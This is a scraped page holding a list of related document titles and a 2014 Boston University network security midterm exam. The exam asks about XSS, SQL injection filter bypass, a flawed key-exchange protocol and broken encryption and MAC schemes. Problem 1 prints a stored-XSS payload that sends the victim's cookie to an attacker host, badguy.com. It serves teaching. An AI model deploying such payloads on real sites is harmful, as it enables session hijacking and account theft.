CS558. Network Security. Boston University, Computer Science. Midterm Spring 2014.



Similar documents
Authenticated encryption

1 Construction of CCA-secure encryption

Authentication and Encryption: How to order them? Motivation

Practice Questions. CS161 Computer Security, Fall 2008

Lecture 9 - Message Authentication Codes

CS 161 Computer Security Spring 2010 Paxson/Wagner MT2

Advanced Topics in Cryptography and Network Security

Cryptosystems. Bob wants to send a message M to Alice. Symmetric ciphers: Bob and Alice both share a secret key, K.

Cryptography and Network Security

CS 758: Cryptography / Network Security

CSCE 465 Computer & Network Security

Advanced Cryptography

Symmetric Crypto MAC. Pierre-Alain Fouque

CS155. Cryptography Overview

Network Security. Computer Networking Lecture 08. March 19, HKU SPACE Community College. HKU SPACE CC CN Lecture 08 1/23

SSL/TLS: The Ugly Truth

Introduction to Cryptography

CIS 6930 Emerging Topics in Network Security. Topic 2. Network Security Primitives

Hash Functions. Integrity checks

CSC474/574 - Information Systems Security: Homework1 Solutions Sketch

Web Payment Security. A discussion of methods providing secure communication on the Internet. Zhao Huang Shahid Kahn

Midterm 2 exam solutions. Please do not read or discuss these solutions in the exam room while others are still taking the exam.

Lecture 13: Message Authentication Codes

Network Security (2) CPSC 441 Department of Computer Science University of Calgary

CS 361S - Network Security and Privacy Spring Homework #1

Message Authentication Codes

SECURITY IN NETWORKS

Overview of Public-Key Cryptography

Computer Networks - CS132/EECS148 - Spring

MESSAGE AUTHENTICATION IN AN IDENTITY-BASED ENCRYPTION SCHEME: 1-KEY-ENCRYPT-THEN-MAC

Authenticity of Public Keys

1 Message Authentication

MAC. SKE in Practice. Lecture 5

Cyber Security Workshop Encryption Reference Manual

Final Exam. IT 4823 Information Security Administration. Rescheduling Final Exams. Kerberos. Idea. Ticket

Lecture 10: CPA Encryption, MACs, Hash Functions. 2 Recap of last lecture - PRGs for one time pads

Chapter 10. Network Security

Database Security. Chapter 21

Overview. SSL Cryptography Overview CHAPTER 1

Information Security

Network Security. Abusayeed Saifullah. CS 5600 Computer Networks. These slides are adapted from Kurose and Ross 8-1

Client Server Registration Protocol

Introduction to Cryptography CS 355

MACs Message authentication and integrity. Table of contents

Criteria for web application security check. Version

KEY DISTRIBUTION: PKI and SESSION-KEY EXCHANGE. Mihir Bellare UCSD 1

DataTrust Backup Software. Whitepaper Data Security. Version 6.8

Computer and Network Security. Outline

Identity-based Encryption with Post-Challenge Auxiliary Inputs for Secure Cloud Applications and Sensor Networks

Chapter 8 Security. IC322 Fall Computer Networking: A Top Down Approach. 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012

7 Key Management and PKIs

Identifying and Exploiting Padding Oracles. Brian Holyfield Gotham Digital Science

Network Security. Abusayeed Saifullah. CS 5600 Computer Networks. These slides are adapted from Kurose and Ross 8-1

1 Signatures vs. MACs

Cryptographic hash functions and MACs Solved Exercises for Cryptographic Hash Functions and MACs

3-6 Toward Realizing Privacy-Preserving IP-Traceback

Outline. CSc 466/566. Computer Security. 8 : Cryptography Digital Signatures. Digital Signatures. Digital Signatures... Christian Collberg

Network Security. Gaurav Naik Gus Anderson. College of Engineering. Drexel University, Philadelphia, PA. Drexel University. College of Engineering

Digital Signatures. (Note that authentication of sender is also achieved by MACs.) Scan your handwritten signature and append it to the document?

Network Security. HIT Shimrit Tzur-David

CRYPTOGRAPHY IN NETWORK SECURITY

Ky Vu DeVry University, Atlanta Georgia College of Arts & Science

Chapter 17. Transport-Level Security

Understanding Digital Certificates and Wireless Transport Layer Security (WTLS)

CS 393 Network Security. Nasir Memon Polytechnic University Module 11 Secure

Introduction. Digital Signature

Security. Contents. S Wireless Personal, Local, Metropolitan, and Wide Area Networks 1

CS Final Exam

Network Security Protocols

Princeton University Computer Science COS 432: Information Security (Fall 2013)

Digital Signatures. Prof. Zeph Grunschlag

Digital Signatures. Murat Kantarcioglu. Based on Prof. Li s Slides. Digital Signatures: The Problem

Talk announcement please consider attending!

lundi 1 octobre 2012 In a set of N elements, by picking at random N elements, we have with high probability a collision two elements are equal

Common security requirements Basic security tools. Example. Secret-key cryptography Public-key cryptography. Online shopping with Amazon

SSL A discussion of the Secure Socket Layer

Chapter 7: Network security

SECURE USER GUIDE OUTLOOK 2000

HW/Lab 1: Security with PGP, and Crypto CS 336/536: Computer Network Security DUE 09/28/2015 (11am)

CS 348: Computer Networks. - Security; 30 th - 31 st Oct Instructor: Sridhar Iyer IIT Bombay

Cryptography and Network Security Department of Computer Science and Engineering Indian Institute of Technology Kharagpur

CS377: Database Systems Data Security and Privacy. Li Xiong Department of Mathematics and Computer Science Emory University

Lecture 7: Transport Level Security SSL/TLS. Course Admin

7! Cryptographic Techniques! A Brief Introduction

Authenticated Encryption: Relations among Notions and Analysis of the Generic Composition Paradigm By Mihir Bellare and Chanathip Namprempre

Chapter 23. Database Security. Security Issues. Database Security

What is network security?

Midterm. Name: Andrew user id:

Cryptography: RSA and Factoring; Digital Signatures; Ssh

TELE 301 Network Management. Lecture 18: Network Security

Understanding Digital Certificates and Secure Sockets Layer (SSL)

CIS433/533 - Computer and Network Security Cryptography

Cryptography: Authentication, Blind Signatures, and Digital Cash

Security and Authorization. Introduction to DB Security. Access Controls. Chapter 21

Instructions on TLS/SSL Certificates on Yealink Phones

Transcription:

CS558. Network Security. Boston University, Computer Science. Midterm Spring 2014. Instructor: Sharon Goldberg March 25, 2014. 9:30-10:50 AM. One-sided handwritten aid sheet allowed. No cell phone or calculators allowed. Be specific and precise with your answers. Show your work. Answers without justification will be given little credit. Please clearly indicate which parts of your solution you want graded. You can use the back of each page as a scratch paper. We will only grade the work you do on the exam pages unless you specifically tell us to do otherwise. Good luck! Write Name: Circle room/extra time: MCS148 CAS116 extra time Problem Grade 1 /6 2.1 /3 2.2 /11 2.4 /8 2.3 /10 Total /38 1

Problem 1. The website at www.bank.com allows users to submit comments on the bank s performance using a form. An attacker, who controls the webserver at http://badguy.com, enters the comment below. The comment is NOT sanitized, and becomes part of the webpage. <script>document.location= "http://badguy.com/whateveryouwant.php?cookie=" + document.cookie;"</script> <b> This is a great bank! </b> Suppose the cookie set by the page www.bank.com is not httponly. 1. (3 points). This attack involves a cookie. Whose cookie is it? What is happening to the cookie? Why is this disturbing? 2. (3 points) One week after the comment was submitted, the webserver admin decides to upgrade www.bank.com so that it communicates with its clients over SSL. (That is, all communication between the client and server is properly authenticated and encrypted.) Nothing else about the www.bank.com webpage is changed. Does the attack still work? Why does SSL succeed or fail to protect against this attack? Yes / No 2

Problem 2. Dr. Snakeoil runs a security company called Snake Oil Inc. For the rest of this exam, you will show that Snake Oil Inc. sells products that are NOT secure. 1. (3 points). This product is supposed to defend web forms against SQL injection attacks. To do this, it removes occurrences of the string DROP TABLE from the submitted form input. Your friend buys this product and uses it to protect a form is the front-end to a database that is not read-only. The form has a field that takes in an email address to look up an record in a table called user data. If the form input is a string input, this product produces an SQL query string query: sanitizedinput = Replace(input, "DROP TABLE", "") query = "SELECT * FROM user_data WHERE email = " + sanitizedinput + " ;" (a) Write down a form input that deletes the entire database. Hint: SQL syntax for deleting table tbl is: DROP TABLE tbl; 3

2. This product is marketed as a new way to set up a secure channel. Alice wants to send a message m to the server, and the server wants to respond with a message m. The communication should be confidential, and no man-in-the-middle should be able to tamper with the communication. The server chooses a public-private key pair (SK s, P K s ) and keeps SK s secret. Alice and the server then communicate as below: Alice Choose random symmetric keys k1,k2 I am Alice! I am Server! Key: PK s z = Enc PKs (k1,k2) Server SK s PK s c=enc k1 (m) t=mac k2 (c) c,t c,t c =Enc k1 (m ) t =MAC k2 (c ) (a) (2 points). Write down the algorithm the server uses to recover m. 4

(b) (6 points). Suppose Eve launches a man-in-the-middle attack; she sits on the communication path between Alice and the server, as shown below. Show how Eve can learn the messages m and m. To do this, draw the messages Eve sends and receives from Alice and the Server, as well as the computation she performs in order to learn the messages. We started you off by drawing some, but NOT all, of the arrows involved in the communication. Alice Choose random symmetric keys k1,k2 I am Alice! EVE I am Server! Key: PK s Server SK s PK s 5

(c) (3 points). You use responsible disclosure to disclose this attack to Dr. Snakeoil, and he promises to fix the problem by requiring the addition of a new message, as follows: Now, right after the server receives the message z = Enc P Ks (k1, k2) from Alice, the server sends Alice a tag t which is computed as t = MAC k2 ( Alice, Server,Enc P Ks (k1, k2)) Does this prevent the man-in-the-middle attack you came up with in Part (b)? Explain why or why not. Yes / No 6

3. This product is new and improved symmetric key encryption scheme. The scheme uses a secret 128-bit key that shared by Alice and Bob. This key is used to encrypt and decrypt every message sent from Alice to Bob. To encrypt the message m using key k: Alice breaks m up into blocks m 1, m 2,..., m n, such that each block is 128-bits long. She sends Bob the ciphertext m 1 k, m 2 k,..., m n k. (The symbol is the bitwise XOR. Recall that a a b = b.) (a) (2 points). Write down the security definition for CPA secure symmetric key encryption. (b) (6 points). Snake Oil Inc claims that their scheme is a CPA-secure encryption scheme. Prove that this is false. 7

4. This product is marketed as a new way to protect the integrity of messages. This product requires Alice and Bob to share a secret 28-bit key k that they will use to authenticate every message they send. Then, if Alice wants to send a message m to Bob, she breaks the message m up into three blocks m 1, m 2, m 3 and computes t 1 = HMAC k (m 1 ) t 2 = HMAC k (t 1, m 2 ) t 3 = HMAC k (m 2, m 3 ) Alice then sends m 1, m 2, m 3, t 1, t 2, t 3 to Bob. (a) (2 points). Write down the verification algorithm for this scheme. (b) (2 points). (MAC). Write down the security definition for a Message Authentication Code 8

(c) (6 points). Snake Oil Inc claims the scheme is a secure Message Authentication Code. Prove that this is false. 9

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information